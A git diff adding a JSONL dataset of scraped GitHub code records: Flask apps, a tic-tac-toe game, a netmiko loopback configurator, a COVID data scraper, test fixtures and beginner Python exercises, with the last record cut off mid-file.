diff --git "a/1918.jsonl" "b/1918.jsonl" new file mode 100644--- /dev/null +++ "b/1918.jsonl" @@ -0,0 +1,1426 @@ +{"seq_id":"25727504796","text":"import os\nimport requests\nimport csv\nfrom io import StringIO\nfrom datetime import datetime\nfrom werkzeug.wrappers import Response\nfrom flask import Blueprint, render_template, request, redirect, url_for, flash\n\n\nPORT=os.environ.get('REST_SRV_PORT')\nsilences_blueprint = Blueprint('silences_blueprint', __name__)\n\n@silences_blueprint.route('/silences', methods=['GET'])\ndef get_silences():\n silences = requests.get('http://192.168.1.200:9093/api/v2/silences?silenced=false&inhibited=false&active=true').json()\n data_for_template = {\"metric\" : [], \"value\" : []}\n #for a in silences:\n # print(a[\"comment\"])\n # for d in a:\n # print(f\"{d['name']}, {d['value']}\")\n print(data_for_template)\n #return render_template('pos_dashboard.html', data_for_template=data_for_template, zip=zip)\n return render_template('silences.html', data=silences, datetime=datetime)\n\n@silences_blueprint.route('/silences/report/get', methods=['GET'])\ndef get_report():\n silences = requests.get('http://192.168.1.200:9093/api/v2/silences?silenced=false&inhibited=false&active=true').json()\n # stream the response as the data is generated\n response = Response(_generate_report(silences), mimetype='text/csv')\n # add a filename\n response.headers.set(\"Content-Disposition\", \"attachment\", filename=\"problems-report.csv\")\n return response\n\ndef _generate_report(input_data):\n data = StringIO()\n w = csv.writer(data)\n\n # write header\n w.writerow(('Назва магазину', 'Номер магазину', 'Номер каси', 'Адресса каси', 'Коментар', 'Створив', 'Початок проблеми', 'Очікувана дата закінчення', 'Тип проблеми'))\n yield data.getvalue()\n data.seek(0)\n data.truncate(0)\n\n # write each log item\n for item in input_data:\n shop_name = ''\n id_shop = ''\n id_pos = ''\n instance = ''\n alertname = ''\n\n for match in item[\"matchers\"]:\n if match[\"name\"] == \"shop_name\":\n shop_name = match[\"value\"]\n\n if match[\"name\"] == \"id_shop\":\n id_shop = match[\"value\"]\n\n if match[\"name\"] == \"id_pos\":\n id_pos = match[\"value\"]\n\n if match[\"name\"] == \"instance\":\n instance = match[\"value\"]\n\n if match[\"name\"] == \"alertname\":\n alertname = match[\"value\"]\n \n w.writerow((\n shop_name,\n id_shop,\n id_pos,\n instance,\n item[\"comment\"],\n item[\"createdBy\"],\n datetime.strptime(item[\"startsAt\"] , '%Y-%m-%dT%H:%M:%S.%fZ').strftime(\"%m/%d/%Y, %H:%M:%S\"),\n datetime.strptime(item[\"endsAt\"] , '%Y-%m-%dT%H:%M:%S.%fZ').strftime(\"%m/%d/%Y, %H:%M:%S\"),\n alertname\n #item[0],\n #item[1].isoformat() # format datetime as string\n\n ))\n yield data.getvalue()\n data.seek(0)\n data.truncate(0)","repo_name":"Daleiter/admin_fxpos","sub_path":"views/blueprint/silences/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"72605889970","text":"from Board import Board\r\nfrom tkinter import messagebox\r\nfrom Player import Player\r\n\r\nTEXT_BUTTONS_PROPERTY = \"text\"\r\nNUM_PLAYERS = 2\r\nMESSAGE_BOX_TITLE = \"TIC TAC TOE\"\r\nILLEGAL_MOVE_MSG = \"Illegal move !\"\r\nNUM_BUTTONS_TOTAL = 9\r\nNUM_BUTTONS_PER_ROW = 3\r\nNO_WIN_MSG = \"Game Over-No One Won\"\r\nFIRST_PLAYER_MARK = \"X\"\r\nSECOND_PLAYER_MARK = \"O\"\r\nGAME_OVER_MSG = \"Game Over, would you like to play again?\"\r\nFIRST_PLAYER_IND = 0\r\nSECOND_PLAYER_IND = 1\r\n\r\n\r\nclass TicTacToeGame:\r\n \"\"\" manages a TicTacToe Game \"\"\"\r\n\r\n def __init__(self, game_board, player1, player2):\r\n self.board = game_board\r\n self.set_buttons_logic()\r\n self.players_arr = [player1, player2]\r\n self.cur_player = 0\r\n self.marked_buttons = 0\r\n self.winner = False\r\n self.start_player = 0\r\n\r\n def set_buttons_logic(self):\r\n \"\"\"sets the buttons logic\"\"\"\r\n buttons_arr = self.board.get_buttons_arr()\r\n for button in buttons_arr:\r\n button.config(command=lambda b=button: self.click(b))\r\n\r\n def click(self, button):\r\n \"\"\" the function that is going to be executed when the player clicks\r\n on a button \"\"\"\r\n if button[TEXT_BUTTONS_PROPERTY] == \"\":\r\n self.players_arr[self.cur_player].put_mark(button)\r\n self.marked_buttons += 1\r\n self.cur_player = (self.cur_player + 1) % NUM_PLAYERS\r\n else:\r\n # clicking on marked button\r\n messagebox.showerror(MESSAGE_BOX_TITLE, ILLEGAL_MOVE_MSG)\r\n\r\n self.check_winner()\r\n\r\n def check_winner(self):\r\n \"\"\" checks for a winner\"\"\"\r\n buttons_text_arr = self.board.get_buttons_text_arr()\r\n if self.check_row_win(buttons_text_arr) or \\\r\n self.check_col_win(buttons_text_arr) or \\\r\n self.check_diagonal_win(buttons_text_arr):\r\n self.end_game()\r\n else:\r\n # no one won\r\n if self.marked_buttons == NUM_BUTTONS_TOTAL and \\\r\n self.winner is False:\r\n messagebox.showinfo(MESSAGE_BOX_TITLE, NO_WIN_MSG)\r\n self.end_game()\r\n\r\n def check_row_win(self, lst):\r\n \"\"\" check if there is a row winner \"\"\"\r\n for i in range(0, NUM_BUTTONS_TOTAL, NUM_BUTTONS_PER_ROW):\r\n if lst[i] == lst[i + 1] == lst[i + 2] and lst[i] != \"\":\r\n self.winner = True\r\n messagebox.showinfo(MESSAGE_BOX_TITLE, \"Player \" + lst[i] +\r\n \" Won-Row\")\r\n if lst[i] == FIRST_PLAYER_MARK:\r\n self.players_arr[FIRST_PLAYER_IND].add_point()\r\n else:\r\n self.players_arr[SECOND_PLAYER_IND].add_point()\r\n return True\r\n\r\n def check_col_win(self, lst):\r\n \"\"\" check if there is a col winner \"\"\"\r\n for i in range(NUM_BUTTONS_PER_ROW):\r\n if lst[i] == lst[i + 3] == lst[i + 6] and lst[i] != \"\":\r\n self.winner = True\r\n messagebox.showinfo(MESSAGE_BOX_TITLE,\r\n \"Player \" + lst[i] + \" Won-Column\")\r\n if lst[i] == FIRST_PLAYER_MARK:\r\n self.players_arr[FIRST_PLAYER_IND].add_point()\r\n else:\r\n self.players_arr[SECOND_PLAYER_IND].add_point()\r\n return True\r\n\r\n def check_diagonal_win(self, lst):\r\n \"\"\" check if there is a diagonal winner \"\"\"\r\n if (lst[0] == lst[4] == lst[8]) and (lst[0] != \"\"):\r\n self.winner = True\r\n messagebox.showinfo(MESSAGE_BOX_TITLE, \"Player \" +\r\n lst[0] + \" Won-Diagonal\")\r\n if ((lst[0] == lst[4] == lst[8]) and (\r\n lst[0] == FIRST_PLAYER_MARK)):\r\n self.players_arr[FIRST_PLAYER_IND].add_point()\r\n else:\r\n self.players_arr[SECOND_PLAYER_IND].add_point()\r\n return True\r\n\r\n elif (lst[2] == lst[4] == lst[6]) and (lst[2] != \"\"):\r\n self.winner = True\r\n messagebox.showinfo(MESSAGE_BOX_TITLE, \"Player \" +\r\n lst[2] + \" Won-Diagonal\")\r\n if (lst[2] == lst[4] == lst[6]) and (lst[2] == FIRST_PLAYER_MARK):\r\n self.players_arr[FIRST_PLAYER_IND].add_point()\r\n else:\r\n self.players_arr[SECOND_PLAYER_IND].add_point()\r\n return True\r\n\r\n def end_game(self):\r\n \"\"\"handles the end of the game\"\"\"\r\n msg = messagebox.askyesno(MESSAGE_BOX_TITLE, GAME_OVER_MSG)\r\n if not msg:\r\n X_win = self.players_arr[FIRST_PLAYER_IND].get_player_score()\r\n O_win = self.players_arr[SECOND_PLAYER_IND].get_player_score()\r\n overall_win = \"\"\r\n if X_win == O_win:\r\n overall_win = \"tie\"\r\n elif X_win > O_win:\r\n overall_win = \"X\"\r\n else:\r\n overall_win = \"O\"\r\n\r\n messagebox.showinfo(MESSAGE_BOX_TITLE,\r\n \"Player X Won \" + str(X_win) + \" times\\n\"\r\n + \"Player O Won \" + str(O_win) + \" times\\n\" +\r\n \"Overall winner is: \" + overall_win)\r\n self.board.get_root().destroy()\r\n else:\r\n self.reset_game()\r\n self.play()\r\n\r\n def reset_game(self):\r\n \"\"\" resets the game board for a new game\"\"\"\r\n self.start_player = 1 - self.start_player\r\n if (\r\n self.cur_player != self.start_player): self.cur_player = self.start_player\r\n self.marked_buttons = 0\r\n self.winner = False\r\n self.board.reset_buttons()\r\n\r\n def play(self):\r\n \"\"\" this function starts the game\"\"\"\r\n self.board.play()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n board = Board()\r\n playerX = Player(FIRST_PLAYER_MARK)\r\n playerO = Player(SECOND_PLAYER_MARK)\r\n game = TicTacToeGame(board, playerX, playerO)\r\n game.play()\r\n","repo_name":"lioraVes/TicTacToe-GUI","sub_path":"TicTacToeGame.py","file_name":"TicTacToeGame.py","file_ext":"py","file_size_in_byte":5973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"5940523671","text":"from datetime import datetime\nfrom flask import jsonify, redirect\nfrom flask_openapi3 import OpenAPI, Info, Tag\nfrom flask_cors import CORS\nfrom model import Session, Tarefa, Categoria\nfrom schema.tarefa import TarefaDelPtrSchema, TarefaPtrSchema, TarefaSchema, TarefaListSchema, TarefaViewSchema\nfrom schema.categoria import CategoriaListSchema\nfrom schema.erro import ErroSchema\nfrom logger import logger\n\ninfo = Info(title=\"API - Gerenciador de Tarefas - MVP\", version=\"1.0.0\")\napp = OpenAPI(__name__, info=info)\nCORS(app)\n\n# definindo tags\nhome_tag = Tag(name=\"Documentação\", description=\"Seleção de documentação: Swagger, Redoc ou RapiDoc\")\ntarefa_tag = Tag(name=\"Tarefa\", description=\"Adição, visualização e remoção de tarefas\")\ncategoria_tag = Tag(name=\"Categoria\", description=\"Visualização de categorias\")\n\n\n@app.get('/', tags=[home_tag])\ndef home():\n \"\"\"Redireciona para /openapi, tela que permite a escolha do estilo de documentação.\n \"\"\"\n return redirect('/openapi')\n\n@app.post('/tarefa', tags=[tarefa_tag], responses={\"200\": TarefaViewSchema, \"400\": ErroSchema})\ndef adicionar_tarefa(form: TarefaSchema):\n \"\"\"Adiciona uma nova tarefa\n Retorna uma representação da tarefa.\n \"\"\" \n session = Session()\n try:\n tarefa = Tarefa(\n titulo=form.titulo,\n detalhes=form.detalhes,\n data_limite=datetime.strptime(form.data_limite, \"%d/%m/%Y\").date(),\n categoria_id=form.categoria_id\n )\n session.add(tarefa)\n session.commit()\n logger.debug(f\"Adicionando tarefa de titulo: '{tarefa.titulo}'\")\n return jsonify([{\n 'id': tarefa.id, \n 'titulo': tarefa.titulo,\n 'detalhes': tarefa.detalhes,\n 'data_limite': tarefa.data_limite.strftime('%d/%m/%Y'),\n 'categoria': {\n 'id': tarefa.categoria.id,\n 'nome': tarefa.categoria.nome\n } \n }]), 200 \n except Exception as e:\n session.rollback()\n logger.warning(f\"Erro requisição inválida '{tarefa.titulo}'\\n {str(e)}\")\n return {\"erro\": \"erro ao adicionar tarefa\"}, 400\n\n\n@app.get('/tarefa',tags=[tarefa_tag], responses={\"200\": TarefaListSchema, \"400\": ErroSchema})\ndef listar_tarefa(query: TarefaPtrSchema):\n \"\"\"Faz a busca por todas as tarefas ou filtra dependendo dos parametros passados\n Retorna uma representação da listagem de tarefas.\n \"\"\" \n session = Session()\n try:\n #filtro condicional por titulo, id da tarefa e por id da categoria\n filtros = []\n if query.titulo:\n filtros.append(Tarefa.titulo.ilike(f'%{query.titulo}%'))\n elif query.id:\n filtros.append(Tarefa.id==query.id) \n elif query.categoria_id:\n filtros.append(Tarefa.categoria_id==query.categoria_id) \n\n #busca as tarefas no BD utilizando os filtros, se informados \n tarefas = session.query(Tarefa).filter(*filtros).all() \n\n return jsonify([{\n 'id': tarefa.id, \n 'titulo': tarefa.titulo,\n 'detalhes': tarefa.detalhes,\n 'data_limite': tarefa.data_limite.strftime('%d/%m/%Y'),\n 'categoria': {\n 'id': tarefa.categoria.id,\n 'nome': tarefa.categoria.nome\n }\n } for tarefa in tarefas]), 200 \n except Exception as e:\n logger.warning(f\"Erro ao buscar tarefas\\n {str(e)}\")\n return {\"erro\": \"erro ao buscar tarefas\"}, 400\n \n@app.get('/categoria', tags=[categoria_tag], responses={\"200\": CategoriaListSchema, \"400\": ErroSchema})\ndef listar_categorias():\n \"\"\"Faz a busca por todas as categorias cadastradas\n Retorna uma representação da listagem de categorias.\n \"\"\" \n session = Session()\n try:\n return jsonify([\n {\n 'id': categoria.id,\n 'nome': categoria.nome,\n } for categoria in session.query(Categoria).all()\n ]), 200 \n except Exception as e:\n logger.warning(f\"Erro ao buscar categorias\\n {str(e)}\")\n return {\"erro\": \"erro ao buscar categorias\"}, 400 \n\n\n@app.delete('/tarefa', tags=[tarefa_tag], responses={\"200\": TarefaViewSchema, \"400\": ErroSchema})\ndef deletar_tarefa(query: TarefaDelPtrSchema):\n \"\"\"Deleta uma Tarefa a partir do id da tarefa\n Retorna uma representação da Tarefa deletada.\n \"\"\" \n session = Session()\n try:\n tarefa = session.query(Tarefa).get(query.id)\n if tarefa:\n json = jsonify([{\n 'id': tarefa.id, \n 'titulo': tarefa.titulo,\n 'detalhes': tarefa.detalhes,\n 'data_limite': tarefa.data_limite.strftime('%d/%m/%Y'),\n 'categoria': {\n 'id': tarefa.categoria.id,\n 'nome': tarefa.categoria.nome\n }\n }])\n session.query(Tarefa).filter(Tarefa.id == query.id).delete()\n session.commit() \n return json, 200\n else:\n return {\"erro\":\"tarefa não encontrada\"}, 400\n except Exception as e:\n session.rollback()\n logger.warning(f\"Erro ao buscar tarefa\\n {str(e)}\")\n return {\"erro\": \"erro ao buscar tarefa\"}, 400","repo_name":"bpbastos/backend-python-basico","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"3949192079","text":"from collections import deque\r\n\r\ns = int(input())\r\n\r\nq = deque()\r\n# 이모티콘 1개 클립 이모티콘 0개\r\nq.append((1,0))\r\n\r\n# visited[i][j] -> i개번째에 j개의 클립 만드는 시간\r\nvisited = [[0] * 1001 for _ in range(1001)]\r\n\r\nwhile q:\r\n i, clip = q.popleft()\r\n # 목표개수에 도달하면\r\n if i == s:\r\n print(visited[i][clip])\r\n break\r\n\r\n # 현재 이모티콘 복사하기\r\n if visited[i][i] == 0:\r\n # clip을 i개로 복사했으니까 1초 더해준다\r\n visited[i][i] = visited[i][clip] + 1\r\n # 이모티콘 i개 클립 i개 q에 저장\r\n q.append((i,i))\r\n\r\n # 다음은 현재 이모티콘에서 클립만큼 더하거나 1개를 뺀다\r\n for next in (i+clip, i-1):\r\n # 방문한적없고 구역 내 이면\r\n if 2 <= next < 1001 and visited[next][clip] == 0:\r\n visited[next][clip] = visited[i][clip] + 1\r\n q.append((next,clip))","repo_name":"wns0394/BaekJoon","sub_path":"백준/Gold/14226. 이모티콘/이모티콘.py","file_name":"이모티콘.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"72053911090","text":"import pytest\n\nfrom pages.battleship_v3.models import Player\n\n\n@pytest.fixture\ndef battleship_v3(request):\n return request.param()\n\n\n@pytest.fixture\ndef player1():\n\n return Player(id=1, name=\"Player 1\")\n\n\n@pytest.fixture\ndef player2():\n\n return Player(id=2, name=\"Player 2\")\n\n\n@pytest.fixture\ndef game(player1, player2, battleship_v3):\n game_id = battleship_v3.create_game([player1.id, player2.id])\n return battleship_v3.get_game(game_id)\n\n\nimport pytest\n\nfrom pages.battleship_v3.models import Direction, ShipPlacement, ShipType\n\n\n@pytest.fixture\ndef place_all_ships(battleship_v3, player1, player2, game):\n ship_placements = [\n (ShipType.CARRIER, \"A\", 1),\n (ShipType.BATTLESHIP, \"C\", 1),\n (ShipType.CRUISER, \"E\", 1),\n (ShipType.SUBMARINE, \"G\", 1),\n (ShipType.DESTROYER, \"I\", 1),\n ]\n\n for ship_type, start_column, start_row in ship_placements:\n placement1 = ShipPlacement(\n game_id=game.id,\n ship_type=ship_type,\n start_row=start_row,\n start_column=start_column,\n direction=Direction.HORIZONTAL,\n )\n battleship_v3.create_ship_placement(game.id, player1.id, placement1)\n\n placement2 = ShipPlacement(\n game_id=game.id,\n ship_type=ship_type,\n start_row=start_row,\n start_column=start_column,\n direction=Direction.HORIZONTAL,\n )\n battleship_v3.create_ship_placement(game.id, player2.id, placement2)\n\n return True\n","repo_name":"Significant-Gravitas/opensoft","sub_path":"deprecated/battleship_v3/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"70013987570","text":"import os\nfrom utils import convertTime, lenVideo, isVideo\n\npath = input('Enter the absolute path to your videos folder - ')\npath = fr'{path}'.format(path=path)\n\n\nos.chdir(path=path)\nseconds = 0\n\n\nfiles = os.listdir()\n\nfor file in files:\n absolute_path = os.path.join(os.getcwd(), file)\n seconds += lenVideo(path=absolute_path)\n\nspeeds = [1, 1.25, 1.5, 1.75, 2, 2.5, 2.7, 3, 3.25, 3.5]\n\nfor speed in speeds:\n seconds /= speed\n print(\n f\"\\nTime required at a speed of {speed}x - {convertTime(seconds=seconds)}\")\n seconds *= speed\n","repo_name":"guptaharsh13/personal-automation","sub_path":"single_folder.py","file_name":"single_folder.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"20"} +{"seq_id":"40621200716","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport aurespf.solvers as au\nfrom nhgrid import nh_Nodes\n\n\"\"\" This file looks for incidents in the small network,\n EU + first neighbors where for a region the balancing\n energy is bigger for the unconstrained the the constrained case.\n Look in the ./results/figures/CheckStrangeBE/ folder for results.\n\n \"\"\"\n\nregions = ['EU', 'RU', 'NA', 'ME']\n\nNcopper = nh_Nodes(load_filename=\"EU_RU_NA_ME_aHE_copper_sqr.npz\")\nNconstrained = nh_Nodes(load_filename=\"EU_RU_NA_ME_aHE_0.6q99_sqr.npz\")\ncopper_flows = np.load(\"./results/EU_RU_NA_ME_aHE_copper_sqr_flows.npy\")\nconstr_flows = np.load(\"./results/EU_RU_NA_ME_aHE_0.6q99_sqr_flows.npy\")\n\nlinklist = [au.AtoKh(Ncopper)[-1][i][0] \\\n for i in range(len(au.AtoKh(Ncopper)[-1]))]\nprint(linklist)\n\ndef analyze_incident(hour):\n mismatch = {}\n copper_injection = {}\n constr_injection = {}\n copper_flow_dict = {}\n constr_flow_dict = {}\n for i in xrange(4):\n mismatch[regions[i]] = Ncopper[i].mismatch[hour]\n copper_injection[regions[i]] = mismatch[regions[i]]\\\n - Ncopper[i].curtailment[hour]\\\n + Ncopper[i].balancing[hour]\n constr_injection[regions[i]] = mismatch[regions[i]]\\\n - Nconstrained[i].curtailment[hour]\\\n + Nconstrained[i].balancing[hour]\n\n constr_link_capacities = 0.6*au.get_quant_caps(\\\n filename=\"./results/EU_RU_NA_ME_aHE_copper_sqr_flows.npy\")\n constr_link_cap_dict = {}\n for j in xrange(len(linklist)):\n copper_flow_dict[linklist[j]] = copper_flows[j][hour]\n constr_flow_dict[linklist[j]] = constr_flows[j][hour]\n constr_link_cap_dict[linklist[j]] = [constr_link_capacities[2*j], \\\n constr_link_capacities[2*j+1]]\n\n\n print(np.sum(copper_injection.values()))\n print(np.sum(constr_injection.values()))\n\n return mismatch, copper_injection, constr_injection, copper_flow_dict,\\\n constr_flow_dict, constr_link_cap_dict\n\ndef get_bal_at_hour(copper_nodes, constr_nodes, hour, region='ME'):\n mean_load = copper_nodes[regions.index(region)].mean\n copper_bal = copper_nodes[regions.index(region)].balancing[hour]/mean_load\n constr_bal = constr_nodes[regions.index(region)].balancing[hour]/mean_load\n\n return [copper_bal, constr_bal]\n\n\ndef find_incidents(copper_nodes=Ncopper, constr_nodes=Nconstrained):\n successes = 0\n N = 280512\n hours_of_interest = []\n for h in xrange(N):\n copper_bal = get_bal_at_hour(Ncopper, Nconstrained, hour=h, region='ME')[0]\n constr_bal = get_bal_at_hour(Ncopper, Nconstrained, hour=h, region='ME')[1]\n\n if ((copper_bal - constr_bal)/copper_bal > 1e-4) and \\\n copper_bal > 1e-6:\n successes = successes + 1\n print(copper_bal, constr_bal, h)\n hours_of_interest.append(h)\n\n\n print('Successrate: ', float(successes)/N)\n\n plt.ion()\n plt.plot(Ncopper[3].balancing/Ncopper[3].mean, label='copper')\n plt.plot(Nconstrained[3].balancing/Nconstrained[3].mean, label='constrained')\n plt.title('ME, normalized balancing energy')\n plt.legend()\n plt.xlabel('Hour')\n plt.ylabel('Balancing [normalized]')\n\n return hours_of_interest\n","repo_name":"asadashfaq/eurasia_grid","sub_path":"find_strange_BE.py","file_name":"find_strange_BE.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"4005827424","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Nov 27 20:02:05 2021\n\n@author: arcji\n\"\"\"\n\n\"\"\"\nString opeartors \nLearning guide\n\n\"\"\"\n# make a string \na='xxx'\nb='yyy'\n# append a string\nprint(a+b)\n\n# upper or lower cases\nb.lower()\nb.upper()\n\n# show the escape of a string\nc='i HEART \\'SSS\\'' \n\n# remove character of a characters \nc.strip(\"'\")\n\n# replace a characters\nc.replace('S','DD')\n\n#split a string to list\nc.split(\" \")\n\n#join a list to a string\nd=['222','232131','2131231321']\n\nt=(\":\").join(d)\n\nt\n\n\"\"\"\nList operators\n###########\n\"\"\"\n\na=[1,2,3,4]\nb=[2,324,235]\n\n#combine 2 list \nc=a+b\n\n\n#select top 5 elemets\nprint(c[0:5])\n\n#select last 2 elements\nprint(c[-2:])\n#select all but last 2 elements\nprint(c[:-2])\n\n#add new elements\nc.append([2,2,3])\n\n#remove element\nc.pop() #remove last one\n\nc.pop(2) # remove the xth element\n\nc.remove(1) \n\n# count occurence of an element\nc.count(2)\n\n#sort \nsorted(c,reverse=True )\n\n# use range to create dummy data\n\nx=list(range(9))\nx\n\n\n\nfor i in x:\n print(x)\n \nfor l,i in enumerate(x):\n print (l,i)\n\n\n\"\"\"\nDictionary\n###########\n\"\"\"\n\nd={}\nd['qqw']=1\nd['qqwxx']=2\n\n# change vlaues o a key\n\nd['qqw']='tt'\n\nd.keys()\nd.values()\n\n#for loop iterates \n\nfor key,value in d.items():\n print(key,value)\n \n\"word count \"\n\ntxt='i lsio i sliol w,e abadio'\n\nlxx=txt.split(\" \")\n\n\ncounter={}\n\nfor t in lxx: \n if t in counter:\n counter[t]+=1\n else:\n counter[t]=1\n \n","repo_name":"50CENTSJAY/50CENTSJAY","sub_path":"Pandas_data vis_list_dict/List and dictionary.py","file_name":"List and dictionary.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"35138827389","text":"from utils import *\nimport matplotlib.pyplot as plt\nseg = fingernailseg()\nprint('create_unet')\nseg.create_unet()\nseg.load_model()\nprint('predicting')\n\nmask = seg.predict()\nraw = seg.X_test\nfor i in range(0,seg.X_test.__len__()):\n plt.figure(figsize=(5,5))\n rand_image = i\n plt.imshow(raw[rand_image,:,:,:])\n plt.imshow(mask[rand_image,:,:,0], alpha=0.8)\n #plt.title('Fingernails segmentation of test image', fontsize=15)\n filename = str(rand_image)+'.png'\n plt.savefig(filename)\n print('saved',filename)\nprint('done')\n","repo_name":"decebel/keras-unet","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"20"} +{"seq_id":"13265856354","text":"import re\nfrom netmiko import ConnectHandler\n\ndef getDataFromDevice(params, command):\n \"\"\"Send command to device and return the result\"\"\"\n with ConnectHandler(**params) as ssh:\n result = ssh.send_command(command)\n return result\n\ndef checkForInterface(params, interfaceName):\n \"\"\"Check if interface exists, return True if it does\"\"\"\n return getDataFromDevice(params, f\"sh ip int br | include {interfaceName}\") != \"\"\n\ndef getInterfaceIP(params, interfaceName):\n \"\"\"Get ip address of interface\"\"\"\n command = f\"sh ip int {interfaceName} | include Internet address\"\n result = getDataFromDevice(params, command)\n ipAddr = re.search(\"\\d+\\.\\d+\\.\\d+\\.\\d+\", result).group()\n subnetMask = re.search(\"/\\d+$\", result).group()\n return (ipAddr, subnetMask)\n\ndef createLoopback(params, loopbackNumber, ipAddr, subnetMask):\n \"\"\"Create loopback interface with loopbackNumber\"\"\"\n interfaceExists = checkForInterface(params, f\"Loopback{loopbackNumber}\")\n if interfaceExists:\n interfaceAddr = getInterfaceIP(params, f\"Loopback{loopbackNumber}\")\n integerForm = \"/\" + str(sum([bin(int(i)).count(\"1\") for i in subnetMask.split(\".\")]))\n if interfaceAddr[0] != ipAddr or interfaceAddr[1] != integerForm:\n deleteLoopback(params, loopbackNumber)\n interfaceExists = False\n if not interfaceExists:\n with ConnectHandler(**params) as ssh:\n ssh.send_config_set([f\"int loop {loopbackNumber}\", f\"ip addr {ipAddr} {subnetMask}\"])\n return f\"Loopback{loopbackNumber} created\"\n return f\"Loopback{loopbackNumber} already exists\"\n\n\ndef deleteLoopback(params, loopbackNumber):\n \"\"\"Delete loopback interface with loopbackNumber\"\"\"\n interfaceExists = checkForInterface(params, f\"Loopback{loopbackNumber}\")\n if interfaceExists:\n with ConnectHandler(**params) as ssh:\n ssh.send_config_set([f\"no int loop {loopbackNumber}\"])\n return f\"Loopback{loopbackNumber} deleted\"\n return f\"Loopback{loopbackNumber} does not exist\"\n\n \nif __name__ == '__main__':\n device_ip = \"10.0.15.103\"\n username = \"admin\"\n password = \"cisco\"\n\n device_params = {\"device_type\": \"cisco_ios\",\n \"ip\": device_ip,\n \"username\": username,\n \"password\": password\n }\n\n result = createLoopback(device_params, 62070088, \"192.168.1.1\", \"255.255.255.0\")\n #result = deleteLoopback(device_params, 62070088)\n print(result)\n","repo_name":"Hanon088/NPA2021-Final","sub_path":"62070088-netmiko.py","file_name":"62070088-netmiko.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"31959449314","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Apr 20 14:43:23 2020\r\n\r\n@author: haldf\r\n\"\"\"\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pickle\r\n\r\nprint('0')\r\n\r\nURL = 'https://en.wikipedia.org/wiki/List_of_states_and_territories_of_the_United_States_by_population'\r\npage = requests.get(URL)\r\nsoup = BeautifulSoup(page.content, 'html.parser')\r\ntable = soup.find_all('table')[0] \r\nstates = pd.read_html(str(table))[0]\r\nstates = states.iloc[0:,[2,3]]\r\nstates.columns = [\"State\",\"Population\"]\r\nstates = states.iloc[0:np.where(states.State ==\"Contiguous United States\")[0][0]]\r\n\r\nprint('1')\r\n\r\ncovid_states = {}\r\ninfection_time = 10\r\n\r\nfor i in states['State']:\r\n URL = 'https://covidtracking.com/data/state/'+ i.replace(\" \",\"-\").replace(\".\",\"\") +'#historical' \r\n page = requests.get(URL)\r\n soup = BeautifulSoup(page.content, 'html.parser')\r\n table = soup.find_all('table')[1] \r\n df = pd.read_html(str(table))[0]\r\n df = df.iloc[np.arange(df.shape[0]-1,0,-1),0:]\r\n df[\"Date\"] = df[\"Date\"].str[4:]\r\n active = df['Positive']\r\n n = df['Positive'].shape[0]\r\n recovered = np.zeros(n)\r\n recovered[infection_time:] = df['Positive'][0:(n-infection_time)]\r\n df[\"Active\"] = active - recovered\r\n df['Recovered'] = recovered\r\n print(i)\r\n covid_states[i] = df\r\n \r\npickle.dump(states,open('states','wb'))\r\npickle.dump(covid_states,open('covid_states','wb'))\r\n","repo_name":"AndrewZastovnik/AZCov","sub_path":"Load_data.py","file_name":"Load_data.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"20"} +{"seq_id":"12860777322","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Feb 1 15:53:21 2021\r\n\r\n@author: asus\r\n\"\"\"\r\n\r\n\r\n\"\"\"\r\n1)\r\nCreate a list \r\nSwap the second half of the list with the first half of the list \r\nPrint this list on the screen\r\n\r\n\"\"\"\r\n\r\nmy_list = list(range(10)) # create a list which has 10 elements \r\n\r\nx = my_list[:5] # hold the first half element of the list in a variable called x \r\n\r\nmy_list[:5] = my_list[5:] # replace the first half with the last half of the list\r\n\r\nmy_list[5:] = x # replace the last half element with x which is the value of first half at the beginning\r\n\r\nprint(my_list) # print the list\r\n\r\n\"\"\"\r\n2)\r\nAsk the user to input a single digit integer to a variable 'n'\r\nPrint out all of the even numbers from 0 to n (including n)\r\n\r\n\"\"\"\r\n\r\nn = int(input(\"Please enter a single digit integer: \")) #the user inputs the integer number\r\n\r\nwhile n<0 or n>=10 : # while the entered number is not single digit ,\r\n \r\n print(\"That is not single digit!!!\") #print a warning.\r\n \r\n n = int(input(\"please enter a single digit integer: \")) # ask the user to input a number until the condition of while statemnet is not true\r\n \r\n break\r\n\r\neven_numbers = [ i for i in range(n+1) if i % 2 == 0] # assign a list that the even numbers from 0 to n (including n)\r\n \r\nprint(even_numbers) #print out the 